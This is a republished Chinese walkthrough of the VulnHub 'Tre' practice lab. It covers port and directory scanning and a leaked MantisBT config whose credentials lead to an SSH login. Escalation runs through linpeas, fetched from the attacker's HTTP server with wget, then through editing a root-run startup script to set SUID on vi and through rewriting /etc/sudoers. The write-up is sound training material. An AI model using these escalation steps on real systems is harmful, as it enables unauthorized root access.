当前位置: 首页 > news >正文

Tre靶场通关过程(linpeas使用+启动项编辑器提权)

news 2025/8/8 12:23:41

Tre靶场通关

通过信息收集获得到了普通用户账号密码,利用PEASS-ng的linpeas脚本进行提权的信息收集,根据已有信息进行提权。

靶机下载地址:

https://download.vulnhub.com/tre/Tre.zip

信息收集

靶机IP探测:192.168.0.129

arp-scan -l

在这里插入图片描述

端口扫描

nmap -p 1-65535 -sV -A 192.168.0.129
22
80
8082

在这里插入图片描述

目录扫描

python dirsearch.py -u "http://192.168.0.129"

在这里插入图片描述

info.php

在这里插入图片描述

adminer.php

在这里插入图片描述

dirsearch默认字典没扫除其他有用信息,看别人通关原来是字典的原因,利用dirb大字典扫描目录

dirb http://192.168.0.129 /usr/share/wordlists/dirb/big.txt

在这里插入图片描述

dirb扫描文件用以下命令

dirb http://192.168.0.129 /usr/share/wordlists/dirb/big.txt -X .php

在扫描的

http://192.168.0.129/mantisbt/config/ 目录下的a.txt文件发现数据库的信息

在这里插入图片描述

在这里插入图片描述

# --- Database Configuration ---
$g_hostname      = 'localhost';
$g_db_username   = 'mantissuser';
$g_db_password   = 'password@123AS';
$g_database_name = 'mantis';
$g_db_type       = 'mysqli';

在adminer.php页面进行登录

在这里插入图片描述

找到了用户密码信息

在这里插入图片描述

其中Tre用户可以直接ssh登录

usr:tre
pwd:Tr3@123456A!ssh tre@192.168.0.129

在这里插入图片描述

提权阶段

接下来对tre用户进行提权

主要学习下LinPEAS这个提权脚本(Linux/Unix/MacOS),同PEASS-ng里还有Windows的提权脚本WinPEAS

wget https://github.com/carlospolop/PEASS-ng/releases/download/20230425-bd7331ea/linpeas.sh

LinPEAS是一个没有任何依赖的脚本,它使用/bin/sh语法,用于搜索在 Linux/Unix*/MacOS 主机上搜索可能的权限提升路径。默认情况下,LinPEAS 不会向磁盘写入任何内容,也不会尝试以任何其他用户身份使用 su 。

该脚本工具枚举并搜索主机内部可能的错误配置(已知漏洞、用户、进程和文件权限、特殊文件权限、可读/可写文件、暴力破解其他用户(top1000pwds)、密码…),并用颜色突出显示可能的错误配置。

给执行权限,看一下命令参数

chmod 777 linpeas.sh
./linpeas.sh -h

在这里插入图片描述

开启http服务将脚本传到靶机

python -m http.server 80

靶机执行

wget http://192.168.0.130/linpeas.sh

在这里插入图片描述

给权限运行脚本,由于内容比较多输出到一个文件中方便查看

./linpeas.sh > 1.txt

在kali攻击机中将生成的文件拷贝出来

rsync -avz tre@192.168.0.129:/home/tre/1.txt /root/linpeas.txt-a:保持原属性
-v:详细信息
-z:在传输文件时压缩减少网络带宽占用

对生成的报告文件进行分析

more linpeas.txt

内嵌了linux-exploit-suggester,可以根据扫描出的内核漏洞进行提权

在这里插入图片描述

发现存在一条/bin/bash /usr/bin/check-system的进程,是root用户启动的
在这里插入图片描述

查看check-system脚本

cat /usr/bin/check-system

在脚本中发现该脚本的作用是输出Service started at+当前日期,重定向到系统日志等级为info,之后跟了一段死循环一直Checking…让我们发现这个进程用的

在这里插入图片描述

不难判断这个一定是开机自启动项,验证一下

ls /etc/systemd/system
cat /etc/systemd/system/check-system.service

在这里插入图片描述

或者直接

systemctl list-unit-files | grep enable

在这里插入图片描述

提权思路有了:更改这个脚本给vi编辑器s权限,让服务器重启生效,通过vi修改/etc/passwd

有两个问题需要判断:

1.脚本是否有写权限(有)

在这里插入图片描述

2.服务器如何重启

发现tre用户有shutdown的sudo权限

在这里插入图片描述

利用命令重启

sudo shutdown -r now

发现条件都具备了,修改脚本

在这里插入图片描述

进行重启,重新连接,之后vi编辑器就具备了sudo权限,可以横着走了

想改/etc/passwd加一条用户

tpa:123456:0:0:tpa:/root:/bin/bash

但不知道为什么利用用户tpa和密码123456登录不上去

尝试其他方法,想到修改sudo权限,给tre用户增加全部命令的sudo权限

vi /etc/sudoers

在这里插入图片描述

直接利用sudo反弹到root,拿到flag

sudo /bin/bash

在这里插入图片描述

http://www.lryc.cn/news/65497.html

相关文章:

  • java多线程下
  • 使用无标注的数据训练Bert
  • 《Netty》从零开始学netty源码(五十二)之PoolThreadCache
  • 放弃40k月薪的程序员工作,选择公务员,我来分享一下看法
  • 【MybatisPlus】高级版可视化、可配置 自动生成代码
  • 【图像分割】【深度学习】Windows10下f-BRS官方代码Pytorch实现
  • 2023/5/4总结
  • electron+vue3全家桶+vite项目搭建【17】pinia状态持久化
  • java基础入门-05-【面向对象进阶(static继承)】
  • day12 IP协议与ethernet协议
  • 蓝牙耳机哪款性价比高?2023蓝牙耳机性价比排行
  • 关于C语言的一些笔记
  • 【Python入门知识】NumPy数组迭代及连接
  • 我们公司的面试,有点不一样!
  • C++之初识STL—vector
  • 资讯汇总230503
  • C++之编程规范
  • ChatGPT做PPT方案,10组提示词方案!
  • 分布式夺命12连问
  • sourceTree离线环境部署
  • 6.1.1 图:基本概念
  • SlickEdit for Windows and Linux crack
  • ChatGPT实现stackoverflow 解释
  • 第五章 作业(123)【编译原理】
  • 基于Vue的个性化网络学习笔记系统
  • 如何搭建一个HTTP实验环境
  • Electron 环境搭建
  • 农机电招平台~java
  • springboot+vue体质测试数据分析及可视化设计(源码+文档)
  • thinkphp+vue+html高校固定资产管理系统维修 租借4h80u